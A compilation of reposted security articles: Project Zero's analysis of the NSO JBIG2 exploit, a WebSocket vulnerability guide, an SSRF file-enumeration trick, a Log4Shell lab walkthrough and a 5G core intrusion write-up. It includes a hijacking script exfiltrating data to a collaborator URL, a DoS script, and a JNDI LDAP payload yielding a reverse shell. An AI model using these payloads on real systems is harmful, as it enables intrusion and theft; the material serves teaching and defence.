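    The field corruption follows from how a little-endian 64-bit pointer lands across two adjacent 32-bit fields; a small sketch (the pointer value here is hypothetical, but in the stated range):

```python
import struct

# A hypothetical JBIG2Bitmap pointer in the 0x100000000-0x1ffffffff range.
ptr = 0x1a3b4c5d8

# Write the 64-bit pointer over two adjacent 32-bit fields, little endian:
low, high = struct.unpack('<II', struct.pack('<Q', ptr))

print(hex(high))  # prints 0x1 (the half that lands in fields like w/line)
print(hex(low))   # prints 0xa3b4c5d8 (the heap/ASLR-dependent half)
```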

     

    This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.

     

    The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:

     

     

     


    The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

     

    By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.

     

    At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

     

    My other compression format is turing-complete!

     

    As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

     

    In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

     

     


    The memory layout showing how logical operators can be applied out-of-bounds
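    The primitive can be modeled as a byte-wise logical combination between two regions of a single flat buffer; in the real exploit the offsets reach past the page's true bounds. A minimal sketch (the layout and offsets are hypothetical):

```python
def combine(memory, dst_off, src_off, length, op):
    # Apply op byte-wise, memory[dst] = op(memory[dst], memory[src]),
    # mimicking a refinement combination between two canvas regions.
    for i in range(length):
        memory[dst_off + i] = op(memory[dst_off + i], memory[src_off + i]) & 0xFF

mem = bytearray(b'\x00' * 8 + b'\x5a' * 8)
combine(mem, 0, 8, 8, lambda a, b: a | b)  # OR: copy the source bits in
assert mem[:8] == b'\x5a' * 8
combine(mem, 0, 8, 8, lambda a, b: a ^ b)  # XOR with the same source clears
assert mem[:8] == b'\x00' * 8
```

    With the page unbounded, dst_off and src_off are no longer confined to the canvas, which is exactly the out-of-bounds read/modify/write primitive described above.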

     

    It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

     

    You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

     

    With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

     

     


    An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1, creating a NAND.

     

    A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.
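    The back-of-the-envelope argument is easy to check by brute force. A sketch over one-bit values, with NOT, AND and OR rebuilt from the NAND that AND plus XOR-with-1 provides:

```python
def NAND(a, b):
    # An AND gate followed by XOR with the constant 1 (a NOT):
    # the exact gate combination described above.
    return (a & b) ^ 1

# NAND is universal: rebuild the other gates from it alone.
def NOT(a):    return NAND(a, a)
def AND(a, b): return NOT(NAND(a, b))
def OR(a, b):  return NAND(NOT(a), NOT(b))

for a in (0, 1):
    for b in (0, 1):
        assert NAND(a, b) == (0 if (a and b) else 1)
        assert AND(a, b) == (a & b)
        assert OR(a, b) == (a | b)
print("all gates verified")  # prints all gates verified
```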

     

    Practical circuits

     

    JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

     

    The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

     

    In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.

     

    Source: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html

  4. Websocket: common vulnerabilities plaguing it and managing them.

    Published by  Surendiran S at  December 17, 2021

    What is WebSocket?

    • Efficient two-way communication protocol
    • WebSocket is stateful where HTTP is stateless
    • Two main parts: Handshake and data transfer

    WebSockets allow the client/server to create a bidirectional communication channel. The client and server then communicate asynchronously, and messages can be sent in either direction.

    WebSockets are particularly useful in situations where low-latency or server-initiated messages are required, such as real-time feeds of data, online chat applications, message boards, web interfaces, and commercial applications.

    The format of a WebSocket URL:

    ws://redacted.com used for unencrypted connection

    wss://redacted.com used for a secure SSL connection

    The browser and server perform a WebSocket handshake using HTTP to connect. The browser issues a WebSocket handshake request, and if the server accepts the connection then, it returns a WebSocket handshake response. After the response, the network connection remains open and can be used to send WebSocket messages in both directions.


    Using the shodan.io search engine, it is possible to find WebSocket applications on the Internet. Search Query: Sec-WebSocket-Version


    Vulnerabilities in WebSocket

    Some vulnerabilities that occur in WebSocket applications:

    • Cross-site websocket hijacking
    • Unencrypted communication
    • Denial of service  
    • Input vulnerabilities, etc…

    Cross-Site WebSocket Hijacking:

    Cross-site WebSocket hijacking is also known as cross-origin WebSocket hijacking. It is possible when the server relies only on the session authentication data (cookies) to perform an authenticated action and the origin is not properly checked by the application.

    When users open the attacker-controlled site, a WebSocket is established in the context of the user’s session. Attackers can connect to the vulnerable application using the attacker-controlled domain. Then the attacker can communicate with the server via WebSockets without the victim’s knowledge. Attackers can then communicate with the application through the WebSocket connection and also access the server’s responses.

    A common script that can be used for exploitation of this vulnerability can be found below:

    <script>
      var ws = new WebSocket('wss://redacted.com');
      ws.onopen = function() {
        ws.send("READY");
      };
      ws.onmessage = function(event) {
        fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
      };
    </script>

    An attacker can observe exfiltrated data in the HTTP interactions request body.


    Unencrypted Communications:

    WS is a plain-text protocol, just like HTTP. The information is transferred through an unencrypted TCP channel, and an attacker can capture and modify the traffic over the network.

    Denial of Service:

    WebSockets allow unlimited connections by default, which can lead to DoS. This affects the ws package, versions <1.1.5 and >=2.0.0 <3.3. The following script can be used to perform DoS attacks on vulnerable applications.

    const WebSocket = require('ws');
    const net = require('net');

    const wss = new WebSocket.Server({ port: 3000 }, function () {
      const payload = 'constructor';  // or ',;constructor'
      const request = [
        'GET / HTTP/1.1',
        'Connection: Upgrade',
        'Sec-WebSocket-Key: test',
        'Sec-WebSocket-Version: 8',
        `Sec-WebSocket-Extensions: ${payload}`,
        'Upgrade: websocket',
        '\r\n'
      ].join('\r\n');

      const socket = net.connect(3000, function () { socket.resume(); socket.write(request); });
    });

    Input Validation Vulnerabilities:

    Injection attacks occur when an attacker passes malicious input via WebSockets to the application. Some possible kinds of attacks are XSS, SQL injections, code injections, etc.

    Example: Let’s say the application uses Websockets and the attacker passes a malicious input in the UI of the application.


    In this case, the input is HTML-encoded by the client before sending it to the server, but the attacker can intercept the request with a web proxy and modify the input with a malicious payload.


    Observe that input passed by the attacker is executed by the application.


    Mitigation:

    It is recommended to follow the protective measures when implementing the web sockets:

    • Use of encrypted (TLS) WebSockets connection. The URI scheme for it is wss://
    • Checking the ‘Origin’ header of the request. This header was designed to protect against cross-origin attacks. If the ‘Origin’ is not trusted, then simply reject the request.
    • Use session-based individual random tokens (just like CSRF-Tokens). Generate them server-side and have them in hidden fields on the client-side and verify them at the request.
    • Input validation of messages using the data model in both directions.
    • Output encoding of messages when they are embedded in the web application.
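    As an illustration of the Origin check (the handler hook and allow-list here are hypothetical), the handshake only needs an exact comparison against trusted origins before accepting the upgrade:

```python
# Hypothetical allow-list; in practice load this from configuration.
TRUSTED_ORIGINS = {"https://app.example.com"}

def allow_handshake(headers):
    # Reject the upgrade unless the browser-controlled Origin header
    # matches a trusted origin exactly (no substring matching).
    origin = headers.get("Origin")
    return origin in TRUSTED_ORIGINS

print(allow_handshake({"Origin": "https://app.example.com"}))  # prints True
print(allow_handshake({"Origin": "https://evil.example.net"})) # prints False
```

    Note that a missing Origin header is rejected too; combined with per-session random tokens this closes the cross-site hijacking vector described above.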

     

    Conclusion

    Websocket is a bi-directional communication protocol over a single TCP connection. Websocket helps handle high-scale data transfers between server and clients. But one has to be careful while using Websocket, as it has vulnerabilities like cross-site WebSocket hijacking, unencrypted communication, denial of service, etc. 

    References:

    https://book.hacktricks.xyz/pentesting-web/cross-site-websocket-hijacking-cswsh

    https://cobalt.io/blog/a-pentesters-guide-to-websocket-pentesting

    https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc

    https://portswigger.net/web-security/websockets

    https://www.vaadata.com/blog/websockets-security-attacks-risks

     
    Surendiran S
    An intern security consultant at SecureLayer7, Surendiran always brings some unique ideas to the table. With him having just peeped into security consulting and analysis, he is currently exploring the world of cybersecurity and expanding his scope.
     
  5. Enumerating Files Using Server Side Request Forgery and the request Module

    Written by Adam Baldwin with ♥ on 15 December 2017 in  2 min

    If you ever find Server Side Request Forgery (SSRF) in a node.js based application and the app is using the request module you can use a special url format to detect the existence of files / directories.

    While request does not support the file:// scheme, it does support a special url format to communicate with unix domain sockets, and the errors returned from a file existing vs not existing are different.

    The format looks like this. http://unix:SOCKET:PATH and for our purposes we can ignore PATH all together.

    Let’s take this code for example. We’re assuming that as a user we can somehow control the url.

    File exists condition:

     
    const Request = require('request')

    Request.get('http://unix:/etc/passwd', (err) => {
      console.log(err)
    })

    As /etc/passwd exists, request will try to use it as a unix socket; of course it is not a unix socket, so it will give a connection failure error.

     
    { Error: connect ENOTSOCK /etc/passwd
        at Object._errnoException (util.js:1024:11)
        at _exceptionWithHostPort (util.js:1046:20)
        at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14)
      code: 'ENOTSOCK',
      errno: 'ENOTSOCK',
      syscall: 'connect',
      address: '/etc/passwd' }

    File does not exist condition:

    Using the same code with a different file that does not exist.

     
    const Request = require('request')

    Request.get('http://unix:/does/not/exist', (err) => {
      console.log(err)
    })

    The resulting error looks like this.

     
    { Error: connect ENOENT /does/not/exist
        at Object._errnoException (util.js:1024:11)
        at _exceptionWithHostPort (util.js:1046:20)
        at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14)
      code: 'ENOENT',
      errno: 'ENOENT',
      syscall: 'connect',
      address: '/does/not/exist' }

    The difference is small: ENOTSOCK vs ENOENT.
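    The same oracle is easy to reproduce outside the request module; a Python sketch that treats the path as a unix domain socket gets ENOENT only when the file is missing (the exact error for an existing non-socket file varies by platform and permissions):

```python
import errno
import socket

def probe(path):
    # Connect to the path as a unix domain socket; the errno leaks
    # whether the file exists (anything but ENOENT) or not (ENOENT).
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        s.connect(path)
        return None  # it really was a listening socket
    except OSError as e:
        return e.errno
    finally:
        s.close()

print(probe('/does/not/exist') == errno.ENOENT)  # prints True
print(probe('/etc/passwd') == errno.ENOENT)      # prints False: file exists
```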

    While not that severe of an issue on its own, it's a trick that's helped me on past security assessments to enumerate file path locations. Maybe you'll find it useful too.

    Originally posted on Medium

  6. A Detailed Guide on Log4J Penetration Testing

    In this article, we are going to discuss and demonstrate in our lab setup the exploitation of the new vulnerability identified as CVE-2021-44228, affecting the java logging package, Log4j. This vulnerability has a severity score of 10.0, the most critical designation, and offers remote code execution on hosts engaging with software that uses the log4j utility. This attack has also been called "Log4Shell".

    Table of Content

    1. Log4jShell
    2. What is log4j
    3. What is LDAP and JNDI
    4. LDAP and JNDI Chemistry
    5. Log4j JNDI lookup
    6. Normal Log4j scenario
    7. Exploit Log4j scenario
    8. Pentest Lab Setup
    9. Exploiting Log4j (CVE-2021-44228)
    10. Mitigation

    Log4jshell

    CVE-2021-44228

    Description: Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

    Vulnerability Type          Remote Code Execution

    Severity                               Critical

    Base CVSS Score               10.0

    Versions Affected           All versions from 2.0-beta9 to 2.14.1

    CVE-2021-45046

    It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments.

    Vulnerability Type          Remote Code Execution

    Severity                               Critical

    Base CVSS Score               9.0

    Versions Affected           All versions from 2.0-beta9 to 2.15.0, excluding 2.12.2

    CVE-2021-45105

    Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack.

    Vulnerability Type          Denial of Service

    Severity                               High

    Base CVSS Score               7.5

    Versions Affected           All versions from 2.0-beta9 to 2.16.0

    What is Log4j?

    Log4j is a Java-based logging utility that is part of the Apache Logging Services. Log4j is one of the several Java logging frameworks which is popularly used by millions of Java applications on the internet.

    What is LDAP and JNDI

    LDAP (Lightweight Directory Access Protocol) is an open and cross-platform protocol that is used for directory service authentication. It provides the communication language that the application uses to communicate with other directory services. Directory services store lots of important information like, user accounts details, passwords, computer accounts, etc which are shared with other devices on the network.

    JNDI (Java Naming and Directory Interface) is an application programming interface (API) that provides naming and directory functionality to applications written using Java Programming Language.


    JNDI and LDAP Chemistry

    JNDI provides a standard API for interacting with name and directory services using a service provider interface (SPI). JNDI provides Java applications and objects with a powerful and transparent interface to access directory services like LDAP. The table below shows the common LDAP and JNDI equivalent operations.

    [Table: common LDAP operations and their JNDI API equivalents]

    Log4J JNDI Lookup

    Lookups are a kind of mechanism that add values to the log4j configuration at arbitrary places. Log4j has the ability to perform multiple lookups such as map, system properties and JNDI (Java Naming and Directory Interface) lookups.

    Log4j uses the JNDI API to obtain naming and directory services from several available service providers: LDAP, COS (Common Object Services), Java RMI registry (Remote Method Invocation), DNS (Domain Name Service), etc. If this functionality is implemented, then we should see this line of code somewhere in the program: ${jndi:logging/context-name}

    A Normal Log4J Scenario

    [Diagram: a normal Log4j logging flow]

    The above diagram shows a normal log4j scenario.

    Exploit Log4j Scenario

    An attacker who can control log messages or log message parameters can execute arbitrary code on the vulnerable server, loaded from LDAP servers, when message lookup substitution is enabled. As a result, an attacker can craft a special request that would make the utility remotely download and execute the payload.

     Below is the most common example of it using the combination of JNDI and LDAP: ${jndi:ldap://<host>:<port>/<payload>}


    1. An attacker inserts the JNDI lookup in a header field that is likely to be logged.
    2. The string is passed to log4j for logging.
    3. Log4j interpolates the string and queries the malicious LDAP server.
    4. The LDAP server responds with directory information that contains the malicious Java Class.
    5. Java deserializes (or downloads) the malicious Java class and executes it.
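    Since the attack begins with a lookup string in attacker-controlled input, a crude defensive illustration is to scan candidate log input for the JNDI lookup syntax. This naive regex sketch is illustrative only (real-world obfuscations such as nested lookups evade it) and is no substitute for patching:

```python
import re

# Naive signature for the exploit string; nested-lookup obfuscations
# like ${${lower:j}ndi:...} require normalization before matching.
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)

def looks_like_log4shell(value):
    return bool(JNDI_RE.search(value))

print(looks_like_log4shell('${jndi:ldap://192.168.29.163:1389/a}'))  # prints True
print(looks_like_log4shell('Mozilla/5.0 ordinary User-Agent'))       # prints False
```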

    Pentest Lab Setup

    In the lab setup, we will use Kali VM as the attacker machine and Ubuntu VM as the target machine. So let’s prepare the ubuntu machine. 

    git clone https://github.com/kozmer/log4j-shell-poc.git


    Once the git clone command has been completed, browse to the log4j-shell-poc directory. Once inside that directory, we can execute the docker commands:

    cd log4j-shell-poc
    docker build -t log4j-shell-poc .


    After that, run the second command on the github page:

    docker run --network host log4j-shell-poc

    These commands will enable us to use the docker file with a vulnerable app.


    Once completed, we have our vulnerable webapp server ready. Now let’s browse to the target IP address in our kali’s browser at port 8080.


    So, this is the docker vulnerable application and the area which is affected by this vulnerability is the username field. It is here that we are going to inject our payload. So now, the lab setup is done. We have our vulnerable target machine up and running. Time to perform the attack.

    Exploiting Log4j (CVE-2021-44228)

    On the kali machine, we need to git clone the same repository. So type the following command:

    git clone https://github.com/kozmer/log4j-shell-poc.git


    Now we need to install the JDK version. This can be downloaded at the following link.

    https://mirrors.huaweicloud.com/java/jdk/8u202-b08/

    Click on the correct version and download that inside the Kali Linux.


    Now go to the download folder and extract the archive by executing the command below, then move the extracted directory to the /usr/bin folder:

    tar -xf jdk-8u202-linux-x64.tar.gz
    mv jdk-8u202 /usr/bin
    cd /usr/bin


    Once verified, let's exit from this directory and browse to the log4j-shell-poc directory. That folder contains a python script, poc.py, which we are going to configure as per our lab setup settings. Here you need to modify './jdk1.8.2.20/' to '/usr/bin/jdk1.8.0_202/' as highlighted: we have changed the path of the Java location and the Java version in the script.


    Now that all changes have been made, we need to save the file and get ready to start the attack. On the attacker machine, that is the Kali Linux, we will access the vulnerable docker webapp inside a browser by typing the IP of the ubuntu machine followed by :8080.

    Now let’s initiate a netcat listener and start the attack.


    Type the following command

    python3 poc.py --userip 192.168.29.163 --webport 8000 --lport 9001

    in a terminal. Make sure you are in the log4j-shell-poc directory when executing the command.


    This script starts the malicious local LDAP server.

    Now copy the complete command shown after "Send me:":

    ${jndi:ldap://192.168.29.163:1389/a}

    paste it inside the browser in the username field. This will be our payload. In the password field, you can provide anything.


    Click on the login button to execute the payload. Then switch to the netcat windows where we should get a reverse shell.


    We are finally inside that vulnerable webapp docker image.

    Mitigation

    CVE-2021-44228: Fixed in Log4j 2.15.0 (Java 8)

    Implement one of the following mitigation techniques:

    • Java 8 (or later) users should upgrade to release 2.16.0.
    • Java 7 users should upgrade to release 2.12.2.
    • Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
    • Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2

    CVE-2021-45046: Fixed in Log4j 2.12.2 (Java 7) and Log4j 2.16.0 (Java 8)

    Implement one of the following mitigation techniques:

    • Java 8 (or later) users should upgrade to release 2.16.0.
    • Java 7 users should upgrade to release 2.12.2.
    • Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
    • Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2.

    CVE-2021-45105: Fixed in Log4j 2.17.0 (Java 8)

    Implement one of the following mitigation techniques:

    • Java 8 (or later) users should upgrade to release 2.17.0.
    • In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).
    • Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.

    To read more about mitigation, you can access the following  link https://logging.apache.org/log4j/2.x/security.html

    Author: Tirut Hawoldar is a Cyber Security Enthusiast and CTF player with 15 years of experience in IT Security and Infrastructure. Can be Contacted on LinkedIn

     

    Source: https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/

  7. The Subsequent Waves of log4j Vulnerabilities Aren’t as Bad as People Think

    Attacks against 2.15 and the CLI fix require a non-standard logging config

    By DANIEL MIESSLER in INFORMATION SECURITY
    CREATED/UPDATED: DECEMBER 18, 2021

    Home / Information Security / The Subsequent Waves of log4j Vulnerabilities Aren’t as Bad as People Think

     

    log4j non default

    If you’re reading this you’re underslept and over-caffeinated due to log4j. Thank you for your service.

    I have some good news.

    I know a super-smart guy named d0nut who figured something out like 3 days ago that very few people know.

    Once you have 2.15 applied—or the CLI implementation to disable lookups—you actually need a non-default log4j2.properties configuration to still be vulnerable!

    Read that again.

    The bypasses of 2.15 and the NoLookups CLI change don’t affect people unless they have non-defalt logging configurations. From the Apache advisory:

    It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern. apache project security advisory

    “Certain non-default configurations”. I’ve never heard a sweeter set of syllables.

    These can also be set in log4j2.xml or programatically.

    So you need to have changed your configs to include patterns like:

     

    $${ctx:loginId}
    ${ctx
    ${event
    ${env
    

     

    …etc to be vulnerable to a 2.15 patch level or a log4j2.formatMsgNoLookups or LOG4J_FORMAT_MSG_NO_LOOKUPS = true bypass!

    That’s huge! And Nate figured this out like 4 days ago!

     

     

    He mentioned to me multiple times this wasn’t as bad as people thought, but he wasn’t shouting from the rooftops so I didn’t listen well enough. Shame on me.

    He also happens to have a strong meme game.

     

     

    Summary

    1. The first vuln was just as bad as everyone thinks it is. Or worse. It did not require this non-default logging configuration.
    2. But if you are patched to 2.15, or mitigated with the NoLookup config, you are no longer vulnerable unless you ALSO have a logging config option set in your log4j2.properties file that re-enables them.
    3. So, if you’re already patched to 2.15 and/or have the mitigation in place, and don’t have non-standard configs—which you should confirm—you might be able to sleep for a bit.
    4. And of course of course—keep in mind that this all only pertains to vulnerabilities we know about today. And the internet moves fast.
    5. Finally, d0nut is awesome and you should follow his work.

    Notes

    1. This also applies to the DoS that 2.17 addresses.
    2. Thanks to Nate for the great find!

     

     

    divider.png

     

    Written By Daniel Miessler

    Daniel Miessler is a cybersecurity leader, writer, and founder of Unsupervised Learning. He writes about security, tech, and society and has been featured in the New York Times, WSJ, and the BBC.

     

    Sursa: https://danielmiessler.com/blog/the-second-wave-of-log4j-vulnerabilities-werent-nearly-as-bad-as-people-think/

  8. Intruding 5G core networks from outside and inside

     

    5G installations are becoming more present in our life, and will introduce significant changes regarding the traffic demand growing with time. The development of the 5G will is not only an evolution in terms of speed, but also tends to be adapted in a lot of contexts: medical, energy, industries, transportation, etc. In this article, we will briefly present introduce the 5G network, and take as an example the assessment we did with the DeeperCut team to place 3rd on the PwC & Aalto 5G Cybersecurity challenge to introduce possible attacks, but also the tools we developed at Penthertz.

     

    Introduction

    In 2019, a part of our team had the chance to participate and win the "Future 5G Hospital intrusion" challenge of the 5G Cyber Security Hack 2019 edition. This edition was the opportunity to perform intrusion tests in a 5G Non-Standalone Access (NSA) network, which is the kind of network that is currently in use everywhere, from a 5G-NR interface using a provided ISIM card. Details of our intrusion have been documented in a more generic way and were published in Medium.

    This year, we had once again the opportunity to play freely with some 5G network products, and build a new team called "The Deeper Cuts" was composed of Alexandre De Oliveira, Dominik Maier, Marius Muench, Shinjo Park, and myself. Our team applied to the PwC & Aalto challenge which looked really complete for us on the paper, as it was not only looking for vulnerability in a commercial product but a complete network architecture. After 24h, we have been able to play with a lot of assets, discover some future attack vectors that will appear as soon as 5G-NR SA will be in production, but after this challenge we continued experimenting with testbed 5G Core Network to develop our tools.

    In this article, we will briefly remind the two types of 5G networks, and then focus on different scenarios starting from the outside and then looking inside the core network, discussing classic vulnerabilities we can encounter during a security engagement. In this article, we will also introduce one of the tools we made to attack this new type of network.

     

    Mobile network

    5G NSA and SA (remindings)

    Two kinds of architectures are known for the 5G networks:

    • SA (StandAlone);
    • NSA (Non-StandAlone).

    At the time of this article, only NSA is largely deployed and it is rare to see a SA in production available to the public. We can probably expect the SA network to be deployed only in mid-2022 if everything goes right.

    If we make some reminding, the commercial 5G network deployment utilizes the NSA mode and shares the same Core network as LTE, known as NSA LTE assisted NR:

    Heterodyne process
    5G NSA architectures (Source: 3GPP)

    Technically, the same Evolved Packet Core (EPC) is used between 4G and 5G which does not make big changes apart from the radio side where 5G-NR use up to 1024-Quadrature Amplitude Modulation (QAM), supports channels up to 400 MHz, and also with a greater number of subcarriers compared to 4G. But in the end, the final user will still find some speed limitations due to the use of the 4G network shared with 4G antennas.

    In SA, things are going to change completely in the core as a Next-Generation Core Network (NGCN) with replacing the EPC:

    Heterodyne process
    5G SA architectures (Source: 3GPP)

    This new type of network might be able to support very fast connectivity, and a lot of different applications thanks to new concepts such as the Network Function Virtualization (NFV), the splitting of the data and control planes with Software Defined Network (SDN), and the Network Slicing (NS).

    Regarding the NFV in the upcoming 5G-NR SA architecture, the 3GPP opted for a Service-Based Architecture (SBA) approach for the control plane, where services use HTTP/2. The interfaces between the User Equipment (UE) and the core (N1), the network and the core (N2 and N3), as well as the user plan still use a point-to-point link as shown in the following picture.

    Heterodyne process
    SBA architecture of a 5GC

    Generally, once the standards are frozen, the mobile network is rarely upgraded. This could be observed with 2G and 3G, but in 4G a lot of arrived for Machine Type Communications (MTC) and Internet of Things (IoT) applications. As a consequence, the 4G networks had to be updated with a new entity introduced by 3GPP: MTC-IWF (MTC Interworking Function).

    Its new architecture makes 5G core networks more flexible. The SBA model allows having two roles that can be played in software:

    • a provider of services;
    • and a consumer.

    All functions are connected together via an integration BUS using the REST API, and can be updated or deleted, but also reused in another context. Each function as a purpose.

    The User Plane Function (UPF) linked to the gNB is used to connect subscribers to the internet through the Data Network (DN). This function is connected to the Session Management Function (SMF) responsible for managing sessions, but also to handle the tunnel between the access network and the UPF, the selection of the UPF gateway to use, IP addresses allocations and interaction with the Policy Control Function (PCF). The PCF is here applies policy rules to the User Equipment (UE) using data from the Unified Data Repository which stores and allows extracting subscribers' data.

    The Access and Mobility Management Function (AMF) handles:

    • subscriber registration;
    • NAS (Non-Access Stratum) signalling exchange on the N1 interface;
    • subscriber connection management, and subscriber location management.

    The management of user profiles is made by the User Data Management (UDM) and is also used to generate authentication credentials. To authenticate users for 3GPP and non-3GPP accesses, an Authentication Server Function (AUSF) is available.

    The Policy Control Function (PCF) assigns rules to the UE data from the Unified Data Repository (UDR).

    A UE is assigned a slide depending on its type, location, and other parameters defined in the Network Slide Selection Function (NSSF)

    To discover all these instances, a Network Repository Function (NRF) is available and all functions are communicating with it to update their status. We will see that this component reveals to be very interesting during an attack.

    Note that before this post, the NCC group previously published about a stack-overflow vulnerability they found in the UPF of the Open5GS stack. Their publication is interesting as it shows that memory corruptions can happen in these new 5GC networks, and it may be part of another post in this blog, or a YouTube video in our channel.

     

    Attack plan

    To illustrate possible attacks, we will give the example of the 5G Cybersecurity challenge 5GNC architecture provided by PwC & Aalto:

    Heterodyne process
    Aalto & PwC challenge architecture

    This architecture includes a real gNB where the targets were connected in 5G-NR. The staff also let us have a playground core to get familiar with the architecture with SSH accesses. To get the feedback of LED status in real-time, the targets were streamed on a YouTube channel.

    To complete the challenge, organizers provided our generated SSH keys to connect the 5G core network. From there, we had could directly interact with the different exposed entities, but to make things a little spicier, our team also wanted to take it in a redder team approach:

    • fingerprinting the range of the provided public address associated with the 5G core network;
    • discover many exposed hosts with opened services;
    • exploiting web vulnerabilities among opened services;
    • taking 5G core network access to assess Network Functions (NF);
    • deploying a fake NF;
    • others?

    In this challenge, a proprietary 5G core network written in Go was used.

    Let us now see the different steps we took to intrude on this network.

     

    Exposed services

    Even if we were first granted to the playground 5G core network to get familiar with the 5G SA architecture, our team proceeded with some extra fingerprinting to see if they could directly join the 5G core network in production.

    Reverse lookup

    To do so, we took the public IP address, and just reverse looked for other ranges that would be part of the infrastructure. That way we would quickly figure out that one range proper to FI-TKK****-NET could be an interesting beginning:

    whois 195.148.**.**    
    [...]
    
    inetnum:        195.148.***.0 - 195.148.***.255
    netname:        FI-TKK****-NET
    descr:          TKK Comnet
    country:        FI
    admin-c:        MP14***-RIPE
    tech-c:         MP14***-RIPE
    status:         ASSIGNED PA
    mnt-by:         AS17**-MNT
    created:        2009-02-13T10:44:24Z
    last-modified:  2009-02-13T10:44:24Z
    source:         RIPE
    
    person:         Markus P********
    address:        Helsinki University of Technology
    address:        TKK/TLV
    address:        P.O.Box 3000
    address:        FIN-02015 TKK  Finland
    phone:          ****************
    nic-hdl:        MP14***-RIPE
    mnt-by:         AS17**-MNT
    created:        2009-02-13T10:37:57Z
    last-modified:  2017-10-30T22:04:40Z
    source:         RIPE # Filtered
    

    After that, we started scanning this whole range and discover many hosts, including interesting hostnames as follows:

    • 5GC1.research.*.aalto.fi (195.148..***);
    • 5GC2.research.*.aalto.fi (195.148..***).

    Among these hosts, we could also find some other hosts but probably out-of-the-scope as their aim is to test drones and VR/AR. So we have decided to only focus on these two hosts primarily.

    Exposed web interfaces

